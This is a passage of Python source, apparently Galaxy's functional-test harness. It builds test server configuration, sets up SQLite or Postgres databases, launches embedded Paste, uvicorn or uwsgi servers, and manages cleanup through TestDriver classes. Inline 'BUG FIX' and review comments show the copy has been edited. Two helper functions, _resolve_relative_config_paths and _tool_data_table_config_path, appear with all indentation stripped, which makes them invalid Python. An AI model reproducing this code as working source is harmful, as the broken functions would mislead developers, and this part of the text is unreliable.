    update_integrated_tool_panel=False,
    prefer_template_database=False,
    log_format=None,
    conda_auto_init=False,
    conda_auto_install=False,
    use_shared_connection_for_amqp=False,
    allow_tool_conf_override: bool = True,
    allow_path_paste=False,
):
    """Setup environment and build config for test Galaxy instance.

    Creates scratch directories under ``tmpdir`` and returns a dict of
    Galaxy config options. Most defaults can be overridden through
    ``GALAXY_TEST_*`` environment variables.

    NOTE(review): the ``log_format`` parameter is not used anywhere in this
    body — confirm whether callers still rely on it.
    """
    # For certain docker operations this needs to be evaluated out - e.g. for cwltool.
    tmpdir = os.path.realpath(tmpdir)
    if not os.path.exists(tmpdir):
        os.makedirs(tmpdir)
    # Scratch directories for compiled templates, uploaded files and job state.
    template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
    new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
    job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
    user_library_import_dir: Optional[str]
    if use_test_file_dir:
        first_test_file_dir = ensure_test_file_dir_set()
        if not os.path.isabs(first_test_file_dir):
            first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
        library_import_dir = first_test_file_dir
        import_dir = os.path.join(first_test_file_dir, 'users')
        if os.path.exists(import_dir):
            user_library_import_dir = import_dir
        else:
            user_library_import_dir = None
    else:
        user_library_import_dir = None
        library_import_dir = None
    job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
    tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
    tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
    # Prefer a checked-in data manager config when present; the functional-test
    # sample config is always appended.
    default_data_manager_config = None
    for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
        if os.path.exists(data_manager_config):
            default_data_manager_config = data_manager_config
    data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
    if default_data_manager_config is not None:
        data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
    master_api_key = get_admin_api_key()
    # Keep job files around when either no-cleanup env var is set.
    cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ
                              or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
    # Data Manager testing temp path
    # For storing Data Manager outputs and .loc files so that real ones don't get clobbered
    galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
    if allow_tool_conf_override:
        tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
    else:
        tool_conf = default_tool_conf
    conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
    conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
    conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
    if tool_conf is None:
        # As a fallback always at least allow upload.
        tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
    if shed_tool_conf is not None:
        tool_conf = f"{tool_conf},{shed_tool_conf}"
    # Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
    # their parent directories, as per schema.
    data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
    tool_config_file = _resolve_relative_config_paths(tool_conf)
    tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
    config = dict(
        admin_users='test@bx.psu.edu',
        allow_library_path_paste=True,
        allow_path_paste=allow_path_paste,
        allow_user_creation=True,
        allow_user_deletion=True,
        api_allow_run_as='test@bx.psu.edu',
        auto_configure_logging=logging_config_file is None,
        check_migrate_tools=False,
        check_upload_content=False,
        chunk_upload_size=100,
        conda_prefix=conda_prefix,
        conda_auto_init=conda_auto_init,
        conda_auto_install=conda_auto_install,
        cleanup_job=cleanup_job,
        retry_metadata_internally=False,
        data_dir=tmpdir,
        data_manager_config_file=data_manager_config_file,
        enable_beta_tool_formats=True,
        expose_dataset_path=True,
        ftp_upload_purge=False,
        galaxy_data_manager_data_path=galaxy_data_manager_data_path,
        id_secret='changethisinproductiontoo',
        job_config_file=job_config_file,
        job_working_directory=job_working_directory,
        library_import_dir=library_import_dir,
        log_destination="stdout",
        new_file_path=new_file_path,
        override_tempdir=False,
        master_api_key=master_api_key,
        running_functional_tests=True,
        template_cache_path=template_cache_path,
        template_path='templates',
        tool_config_file=tool_config_file,
        tool_data_table_config_path=tool_data_table_config_path,
        tool_parse_help=False,
        tool_path=tool_path,
        update_integrated_tool_panel=update_integrated_tool_panel,
        use_tasked_jobs=True,
        use_heartbeat=False,
        user_library_import_dir=user_library_import_dir,
        webhooks_dir=TEST_WEBHOOKS_DIR,
        logging=LOGGING_CONFIG_DEFAULT,
        monitor_thread_join_timeout=5,
        object_store_store_by="uuid",
        simplified_workflow_run_ui="off",
        strict_cwl_validation=False,
    )
    if default_shed_tool_data_table_config:
        config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
    if not use_shared_connection_for_amqp:
        config["amqp_internal_connection"] = f"sqlalchemy+sqlite:///{os.path.join(tmpdir, 'control.sqlite')}?isolation_level=IMMEDIATE"
    config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
    config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
    if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
        # Write a two-backend hierarchical object store config for this run.
        # NOTE(review): indentation of the YAML literal reconstructed — the
        # dump this was recovered from stripped leading whitespace.
        object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
        with open(object_store_config, "w") as f:
            contents = """
type: hierarchical
backends:
  - id: files1
    type: disk
    weight: 1
    files_dir: "${temp_directory}/files1"
    extra_dirs:
      - type: temp
        path: "${temp_directory}/tmp1"
      - type: job_work
        path: "${temp_directory}/job_working_directory1"
  - id: files2
    type: disk
    weight: 1
    files_dir: "${temp_directory}/files2"
    extra_dirs:
      - type: temp
        path: "${temp_directory}/tmp2"
      - type: job_work
        path: "${temp_directory}/job_working_directory2"
"""
            contents_template = string.Template(contents)
            expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
            f.write(expanded_contents)
        config["object_store_config_file"] = object_store_config
    if datatypes_conf is not None:
        config['datatypes_config_file'] = datatypes_conf
    if enable_tool_shed_check:
        config["enable_tool_shed_check"] = enable_tool_shed_check
        config["hours_between_check"] = 0.001
    tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
    if tool_dependency_dir:
        config["tool_dependency_dir"] = tool_dependency_dir
    # Used by shed's twill dependency stuff
    # TODO: read from Galaxy's config API.
    os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
    return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = f'{default_tool_data_config},{test_tool_data_config}'
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
    """Setup a nose context and run tests.

    Tests are specified by argv (defaulting to sys.argv). Returns True when
    the test run was successful.
    """
    if env is None:
        env = os.environ
    if ignore_files is None:
        ignore_files = []
    if plugins is None:
        plugins = nose.plugins.manager.DefaultPluginManager()
    if argv is None:
        argv = sys.argv
    test_config = nose.config.Config(
        # BUG FIX: was hard-coded to os.environ, silently ignoring the env
        # parameter this function accepts and defaults.
        env=env,
        ignoreFiles=ignore_files,
        plugins=plugins,
    )
    # Add custom plugin to produce JSON data used by planemo.
    test_config.plugins.addPlugin(StructuredTestDataPlugin())
    test_config.configure(argv)
    result = run(test_config)
    success = result.wasSuccessful()
    return success
def copy_database_template(source, db_path):
    """Copy a 'clean' sqlite template database.

    From file or URL to specified path for sqlite database.
    """
    target_dir = os.path.dirname(db_path)
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    if os.path.exists(source):
        # Local file: straight copy.
        shutil.copy(source, db_path)
        assert os.path.exists(db_path)
    elif source.lower().startswith(("http://", "https://", "ftp://")):
        try:
            download_to_file(source, db_path)
        except Exception as e:
            # We log the exception but don't fail startup, since we can
            # do all migration steps instead of downloading a template.
            log.exception(e)
    else:
        raise Exception(f"Failed to copy database template from source {source}")
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
    """Find (and populate if needed) Galaxy database connection."""
    auto_migrate = False
    check_migrate = True
    template_name = None
    dburi_var = f"{prefix}_TEST_DBURI"
    if dburi_var in os.environ:
        connection = os.environ[dburi_var]
        # only template if postgres - not mysql or sqlite
        if prefer_template_database and connection.startswith("p"):
            parsed = urlparse(connection)
            template_name = parsed.path[1:]  # drop / from /galaxy
            fresh_db = f"gxtest{''.join(random.choice(string.ascii_uppercase) for _ in range(10))}"
            connection = parsed._replace(path=f"/{fresh_db}").geturl()
            if not database_exists(connection):
                # We pass by migrations and instantiate the current table
                create_database(connection)
                mapping.init('/tmp', connection, create_tables=True, map_install_models=True)
                toolshed_mapping.init(connection, create_tables=True)
                check_migrate = False
    else:
        sqlite_file = os.path.join(db_path, f"{prefix.lower()}.sqlite")
        template_var = f"{prefix}_TEST_DB_TEMPLATE"
        if template_var in os.environ:
            # Middle ground between recreating a completely new
            # database and pointing at existing database with
            # GALAXY_TEST_DBURI. The former requires a lot of setup
            # time, the latter results in test failures in certain
            # cases (namely tool shed tests expecting clean database).
            copy_database_template(os.environ[template_var], sqlite_file)
            auto_migrate = True
        connection = f'sqlite:///{sqlite_file}'
    config = {
        "check_migrate_databases": check_migrate,
        "database_connection": connection,
        "database_auto_migrate": auto_migrate,
    }
    if not connection.startswith("sqlite://"):
        # Larger pool for real database servers shared across test threads.
        config["database_engine_option_max_overflow"] = "20"
        config["database_engine_option_pool_size"] = "10"
    if template_name:
        config["database_template"] = template_name
    return config
def install_database_conf(db_path, default_merged=False):
    """Build config entries for the tool-shed install database connection."""
    connection: Optional[str]
    if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
        # Explicitly configured URI wins.
        connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
    elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
        # Merged mode: install models share the main Galaxy database.
        connection = None
    else:
        connection = f"sqlite:///{os.path.join(db_path, 'install.sqlite')}"
    return {} if connection is None else {"install_database_connection": connection}
def database_files_path(test_tmpdir, prefix="GALAXY"):
    """Create a mock database/ directory like in GALAXY_ROOT.

    Use prefix to default this if TOOL_SHED_TEST_DBPATH or
    GALAXY_TEST_DBPATH is set in the environment.
    """
    override = os.environ.get(f"{prefix}_TEST_DBPATH")
    if override is not None:
        return override
    return os.path.join(tempfile.mkdtemp(dir=test_tmpdir), 'database')
def _get_static_settings():
    """Configuration required for Galaxy static middleware.

    Returns dictionary of the settings necessary for a galaxy App
    to be wrapped in the static middleware.

    This mainly consists of the filesystem locations of url-mapped
    static resources.
    """
    static_dir = os.path.join(galaxy_root, "static")
    # TODO: these should be copied from config/galaxy.ini
    return {
        'static_enabled': True,
        'static_cache_time': 360,
        'static_dir': static_dir,
        'static_images_dir': os.path.join(static_dir, 'images', ''),
        'static_favicon_dir': os.path.join(static_dir, 'favicon.ico'),
        'static_scripts_dir': os.path.join(static_dir, 'scripts', ''),
        'static_style_dir': os.path.join(static_dir, 'style'),
        'static_robots_txt': os.path.join(static_dir, 'robots.txt'),
    }
def get_webapp_global_conf():
    """Get the global_conf dictionary sent to ``app_factory``."""
    # (was originally sent 'dict()') - nothing here for now except static settings
    return dict(_get_static_settings())
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
    """Wait for an HTTP server to boot up.

    Polls ``http://host:port/`` up to ``sleep_tries`` times, sleeping
    ``sleep_amount`` seconds between attempts. Raises Exception when the
    server never answers with 200.
    """
    # Test if the server is up
    for _ in range(sleep_tries):
        # directly test the app, not the proxy
        conn = http.client.HTTPConnection(host, port)
        try:
            conn.request("GET", "/")
            response = conn.getresponse()
            if response.status == 200:
                break
        except OSError as e:
            # 61 (macOS) / 111 (Linux) are "connection refused" - keep waiting.
            if e.errno not in [61, 111]:
                raise
        time.sleep(sleep_amount)
    else:
        # BUG FIX: the message hard-coded "10 tries" regardless of sleep_tries.
        template = "Test HTTP server on host %s and port %s did not return '200 OK' after %s tries"
        message = template % (host, port, sleep_tries)
        raise Exception(message)
def attempt_port(port):
    """Return *port* if it can be bound on all interfaces, otherwise None."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind(('', port))
        return port
    except OSError:
        return None
    finally:
        # BUG FIX: the original only closed the socket on the success path,
        # leaking the file descriptor whenever bind() failed.
        sock.close()
def attempt_ports(port):
    """Return a usable port for the test server.

    An explicitly requested port is returned as-is. Otherwise up to nine
    random ports between 8000 and 10000 are probed; the first free one is
    exported via GALAXY_WEB_PORT and returned as a string. Raises Exception
    when no free port is found.
    """
    if port is not None:
        # BUG FIX: removed an unreachable `raise` that followed this return
        # in the original; an explicitly configured port is trusted as-is.
        return port
    random.seed()
    for _ in range(0, 9):
        candidate = attempt_port(random.randint(8000, 10000))
        if candidate:
            candidate = str(candidate)
            os.environ['GALAXY_WEB_PORT'] = candidate
            return candidate
    raise Exception(f"Unable to open a port between {8000} and {10000} to start Galaxy server")
def serve_webapp(webapp, port=None, host=None):
    """Serve the webapp on a recommend port or a free one.

    Return the (server, port) pair the webapp is running on.
    """
    port = attempt_ports(port)
    server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
    # Run the Paste server loop on a background thread.
    serving_thread = threading.Thread(target=server.serve_forever)
    serving_thread.start()
    return server, port
def uvicorn_serve(app, port, host=None):
    """Serve the ASGI app with uvicorn on a background event-loop thread.

    Return (server, port, thread) so callers can signal shutdown and join.
    """
    import asyncio
    from uvicorn.config import Config
    from uvicorn.server import Server

    access_log = 'GALAXY_TEST_DISABLE_ACCESS_LOG' not in os.environ
    server = Server(config=Config(app, host=host, port=int(port), access_log=access_log))

    def run_in_loop(loop):
        try:
            asyncio.set_event_loop(loop)
            loop.run_until_complete(server.serve())
        finally:
            # Always tear the loop down, even if serve() raised.
            loop.close()
            asyncio.set_event_loop(None)
            log.info("Event loop for uvicorn closed")

    loop = asyncio.new_event_loop()
    serving_thread = threading.Thread(target=run_in_loop, args=(loop,))
    serving_thread.start()
    return server, port, serving_thread
def cleanup_directory(tempdir):
    """Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.

    Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
    """
    skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
    if skip_cleanup:
        log.info(f"GALAXY_TEST_NO_CLEANUP is on. Temporary files in {tempdir}")
        return
    try:
        # Redundant `not skip_cleanup` re-check removed: it is always False
        # past the early return above (dead condition).
        if os.path.exists(tempdir):
            shutil.rmtree(tempdir)
    except Exception:
        # Best-effort cleanup; never fail a test run over leftover temp files.
        pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
    """Modify Galaxy app's toolbox for migrated or installed tool tests."""
    if not testing_installed_tools:
        return
    # TODO: Do this without modifying app - that is a pretty violation
    # of Galaxy's abstraction - we shouldn't require app at all let alone
    # be modifying it.
    tool_configs = app.config.tool_configs
    # Eliminate the migrated_tool_panel_config from the app's tool_configs,
    # append the installed_tool_panel_configs, and reload the app's toolbox.
    migrated_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
    if migrated_config in tool_configs:
        tool_configs.remove(migrated_config)
    tool_configs.extend(INSTALLED_TOOL_PANEL_CONFIGS)
    from galaxy import tools  # delay import because this brings in so many modules for small tests # noqa: E402
    app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs) -> GalaxyUniverseApplication:
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary and use load_app_properties so
    Galaxy override variables are respected. Also setup "global" references
    to sqlalchemy database context for Galaxy and install databases.
    """
    log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
    global_conf = get_webapp_global_conf()
    global_conf['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
    simple_kwargs['global_conf'] = global_conf
    simple_kwargs = load_app_properties(kwds=simple_kwargs)
    # Build the Universe Application
    app = GalaxyUniverseApplication(**simple_kwargs)
    if not simple_kwargs.get("enable_celery_tasks"):
        # Run celery tasks in-process when a real worker isn't enabled.
        rebind_container_to_task(app)
    log.info("Embedded Galaxy application started")

    global galaxy_context, install_context
    galaxy_context = app.model.context
    install_context = app.install_model.context

    # Toolbox indexing happens via the work queue out of band recently, and,
    # beyond potentially running async after tests execute doesn't execute
    # without building a uwsgi app (app.is_webapp = False for this test kit).
    # We need to ensure to build an index for the test galaxy app -- this is
    # pretty fast with the limited toolset
    app.reindex_tool_search()
    return app
def build_shed_app(simple_kwargs):
    """Build a Tool Shed app object from simple keyword arguments.

    Construct paste style complex dictionary. Also setup "global" reference
    to sqlalchemy database context for tool shed database.
    """
    log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
    # TODO: Simplify global_conf to match Galaxy above...
    simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
    simple_kwargs['global_conf'] = get_webapp_global_conf()

    app = ToolshedUniverseApplication(**simple_kwargs)
    log.info("Embedded Toolshed application started")

    global tool_shed_context
    tool_shed_context = app.model.context
    return app
def explicitly_configured_host_and_port(prefix, config_object):
    """Determine (host, port) for a test server from the environment.

    Returns port None when no explicit port was configured, signalling that
    a random port should be picked later.
    """
    host_env_key = f"{prefix}_TEST_HOST"
    port_env_key = f"{prefix}_TEST_PORT"
    port_random_env_key = f"{prefix}_TEST_PORT_RANDOM"
    default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
    host = os.environ.get(host_env_key, default_web_host)

    if os.environ.get(port_random_env_key, None) is not None:
        # Ignore the port environment variable, it wasn't explictly configured.
        port = None
    else:
        port = os.environ.get(port_env_key, None)

    # If an explicit port wasn't assigned for this test or test case, set this
    # environment variable so we know it is random. We can then randomly re-assign
    # for new tests.
    if port is None:
        # BUG FIX: was hard-coded to "GALAXY_TEST_PORT_RANDOM", which never
        # matched the prefix-derived key checked above for non-GALAXY
        # prefixes (e.g. TOOL_SHED).
        os.environ[port_random_env_key] = "1"
    else:
        os.environ['GALAXY_WEB_PORT'] = port
    return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
    """Export {prefix}_TEST_HOST/_TEST_PORT and block until the server answers."""
    os.environ[f"{prefix}_TEST_HOST"] = host
    os.environ[f"{prefix}_TEST_PORT"] = port
    wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
    """Abstract handle on a running test server (name, host, port).

    Subclasses provide the actual app object and a way to stop the server.
    """

    def __init__(self, name, host, port):
        self.name = name
        self.host = host
        self.port = port

    @property
    def app(self):
        # Subclasses that embed an app in-process override this.
        raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")

    def stop(self):
        # Subclasses own the shutdown mechanics.
        raise NotImplementedError()
class EmbeddedServerWrapper(ServerWrapper):
    """ServerWrapper for a server (Paste or uvicorn) running in this process."""

    def __init__(self, app, server, name, host, port, thread=None):
        super().__init__(name, host, port)
        self._app = app
        self._server = server
        self._thread = thread

    @property
    def app(self):
        return self._app

    def stop(self):
        log.info(f"{threading.active_count()} threads were active before stopping embedded server")

        # Paste servers expose server_close(); uvicorn servers expose
        # shutdown()/should_exit - handle whichever this wrapper holds.
        if self._server is not None and hasattr(self._server, "server_close"):
            log.info(f"Shutting down embedded {self.name} Paste server")
            self._server.server_close()
            log.info(f"Embedded web server {self.name} stopped")

        if self._server is not None and hasattr(self._server, "shutdown"):
            log.info(f"Shutting down embedded {self.name} uvicorn server")
            self._server.should_exit = True
            log.info(f"Embedded web server {self.name} stopped")

        if self._thread is not None:
            log.info("Stopping embedded server thread")
            self._thread.join()
            log.info("Embedded server thread stopped")

        if self._app is not None:
            log.info(f"Stopping application {self.name}")
            self._app.shutdown()
            log.info(f"Application {self.name} stopped.")

        log.info(f"{threading.active_count()} active after stopping embedded server")
class UwsgiServerWrapper(ServerWrapper):
    """ServerWrapper around an external uwsgi subprocess."""

    def __init__(self, p, name, host, port):
        super().__init__(name, host, port)
        self._p = p
        self._r = None
        # Reap the child in the background so it never becomes a zombie.
        self._t = threading.Thread(target=self.wait)
        self._t.start()

    def __del__(self):
        self._t.join()

    def wait(self):
        # Blocks until uwsgi exits and records its return code.
        self._r = self._p.wait()

    def stop(self):
        # Politely terminate the whole process group, then force-kill
        # anything that survived the grace period.
        try:
            os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
        except Exception:
            pass
        time.sleep(.1)
        try:
            os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
        except Exception:
            pass
        self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Launch an external uwsgi server for the supplied Galaxy config.

    Writes the config to <tempdir>/galaxy.yml (optionally prefixed with the
    interactive-tools uwsgi routing section), spawns uwsgi in its own process
    group, waits for it to answer HTTP, and returns a UwsgiServerWrapper.
    On startup failure the spawned process is stopped and the exception is
    re-raised.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)

    config = {}
    config["galaxy"] = kwargs.copy()
    enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
    if enable_realtime_mapping:
        interactive_tool_defaults = {
            "interactivetools_prefix": "interactivetool",
            "interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
            "interactivetools_enable": True
        }
        for key, value in interactive_tool_defaults.items():
            if key not in config["galaxy"]:
                config["galaxy"][key] = value

    yaml_config_path = os.path.join(tempdir, "galaxy.yml")
    with open(yaml_config_path, "w") as f:
        yaml.dump(config, f)

    if enable_realtime_mapping:
        # Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
        # though maybe it would work?
        with open(yaml_config_path) as f:
            old_contents = f.read()
        with open(yaml_config_path, "w") as f:
            test_port = str(port) if port else r"[0-9]+"
            test_host = re.escape(host) if host else "localhost"
            uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
            f.write(uwsgi_section)
            f.write(old_contents)

    def attempt_port_bind(port):
        # Spawn uwsgi bound to the given port; returns a wrapper owning the process.
        uwsgi_command = [
            "uwsgi",
            "--http",
            f"{host}:{port}",
            "--yaml",
            yaml_config_path,
            "--module",
            "galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
            "--enable-threads",
            "--die-on-term",
        ]
        for path in sys.path:
            uwsgi_command.append('--pythonpath')
            uwsgi_command.append(path)
        handle_uwsgi_cli_command = getattr(
            config_object, "handle_uwsgi_cli_command", None
        )
        if handle_uwsgi_cli_command is not None:
            handle_uwsgi_cli_command(uwsgi_command)
        # we don't want to quote every argument but we don't want to print unquoted ones either, so do this
        log.info("Starting uwsgi with command line: %s", ' '.join(shlex.quote(x) for x in uwsgi_command))
        p = subprocess.Popen(
            uwsgi_command,
            cwd=galaxy_root,
            preexec_fn=os.setsid,
        )
        return UwsgiServerWrapper(
            p, name, host, port
        )

    port = attempt_ports(port)
    server_wrapper = attempt_port_bind(port)
    try:
        set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
        log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
        return server_wrapper
    except Exception:
        server_wrapper.stop()
        # BUG FIX: re-raise so callers see the startup failure instead of
        # silently receiving None.
        raise
def launch_uvicorn(webapp_factory, prefix=DEFAULT_CONFIG_PREFIX, galaxy_config=None, config_object=None):
    """Serve a Galaxy application through an embedded uvicorn server.

    Builds the Galaxy app, wraps its WSGI webapp in the FastAPI ASGI app,
    starts uvicorn, waits for the HTTP target to respond, and returns an
    ``EmbeddedServerWrapper`` tracking the app, server, and serving thread.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    port = attempt_ports(port)
    galaxy_app = build_galaxy_app(galaxy_config)
    wsgi_webapp = webapp_factory(
        galaxy_config['global_conf'],
        app=galaxy_app,
        use_translogger=False,
        static_enabled=True,
        register_shutdown_at_exit=False
    )
    # Imported here (not at module level) to defer the heavyweight FastAPI import.
    from galaxy.webapps.galaxy.fast_app import initialize_fast_app
    asgi_app = initialize_fast_app(wsgi_webapp, galaxy_app)
    server, port, thread = uvicorn_serve(asgi_app, host=host, port=port)
    set_and_wait_for_http_target(prefix, host, port)
    log.info(f"Embedded uvicorn web server for {name} started at {host}:{port}")
    return EmbeddedServerWrapper(galaxy_app, server, name, host, port, thread=thread)
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Launch a web server for a given app using supplied factory.

    Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
    TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
    all set after this method has been called.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    wsgi_webapp = webapp_factory(
        kwargs['global_conf'],
        app=app,
        use_translogger=False,
        static_enabled=True,
        register_shutdown_at_exit=False
    )
    server, port = serve_webapp(wsgi_webapp, host=host, port=port)
    set_and_wait_for_http_target(prefix, host, port)
    log.info(f"Embedded paste web server for {name} started at {host}:{port}")
    return EmbeddedServerWrapper(app, server, name, host, port)
class TestDriver:
    """Responsible for the life-cycle of a Galaxy-style functional test.

    Sets up servers, configures tests, runs nose, and tears things
    down. This is somewhat like a Python TestCase - but different
    because it is meant to provide a main() endpoint.
    """
    __test__ = False  # Prevent pytest from discovering this class (issue #12071)

    def __init__(self):
        """Setup tracked resources."""
        self.server_wrappers = []
        self.temp_directories = []

    def setup(self):
        """Called before tests are built."""

    def build_tests(self):
        """After environment is setup, setup nose tests."""

    def tear_down(self):
        """Cleanup resources tracked by this object."""
        self.stop_servers()
        for temp_directory in self.temp_directories:
            cleanup_directory(temp_directory)

    def stop_servers(self):
        """Stop all tracked server wrappers and forget them."""
        for server_wrapper in self.server_wrappers:
            server_wrapper.stop()
        self.server_wrappers = []

    def mkdtemp(self):
        """Return a temp directory that is properly cleaned up or not based on the config."""
        temp_directory = tempfile.mkdtemp()
        self.temp_directories.append(temp_directory)
        return temp_directory

    def run(self):
        """Driver whole test.

        Setup environment, build tests (if needed), run test,
        and finally cleanup resources.
        """
        configure_environment()
        self.setup()
        self.build_tests()
        try:
            success = nose_config_and_run()
            return 0 if success else 1
        except Exception:
            log.info("Failure running tests")
            # Fix: bare ``raise`` instead of ``raise e`` - re-raises the active
            # exception with its original traceback intact.
            raise
        finally:
            log.info("Shutting down")
            self.tear_down()
class GalaxyTestDriver(TestDriver):
    """Instantiate a Galaxy-style nose TestDriver for testing Galaxy."""

    testing_shed_tools = False

    def _configure(self, config_object=None):
        """Setup various variables used to launch a Galaxy server."""
        config_object = self._ensure_config_object(config_object)
        self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
        # Allow a particular test to force uwsgi or any test to use uwsgi with
        # the GALAXY_TEST_UWSGI environment variable.
        use_uwsgi = bool(os.environ.get('GALAXY_TEST_UWSGI', None))
        if not use_uwsgi:
            if getattr(config_object, "require_uwsgi", None):
                use_uwsgi = True
        self.use_uwsgi = use_uwsgi
        # uvicorn is used only when uwsgi was not selected (see _register_and_run_servers).
        if getattr(config_object, "use_uvicorn", USE_UVICORN):
            self.else_use_uvicorn = True
        else:
            self.else_use_uvicorn = False
        # Allow controlling the log format
        log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
        if not log_format and use_uwsgi:
            # uwsgi runs add worker/mule ids to the log records.
            log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
                         "[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
                         "[%(threadName)s] %(message)s"
        self.log_format = log_format
        self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
        self.temp_directories.append(self.galaxy_test_tmp_dir)
        self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
        if getattr(config_object, "framework_tool_and_types", False):
            default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
            datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
        else:
            default_tool_conf = getattr(config_object, "default_tool_conf", None)
            datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
        allow_tool_conf_override = getattr(config_object, "allow_tool_conf_override", True)
        self.allow_tool_conf_override = allow_tool_conf_override
        self.default_tool_conf = default_tool_conf
        self.datatypes_conf_override = datatypes_conf_override

    def setup(self, config_object=None):
        """Setup a Galaxy server for functional test (if needed).

        Configuration options can be specified as attributes on the supplied
        ```config_object``` (defaults to self).
        """
        self._saved_galaxy_config = None
        self._configure(config_object)
        self._register_and_run_servers(config_object)

    def restart(self, config_object=None, handle_config=None):
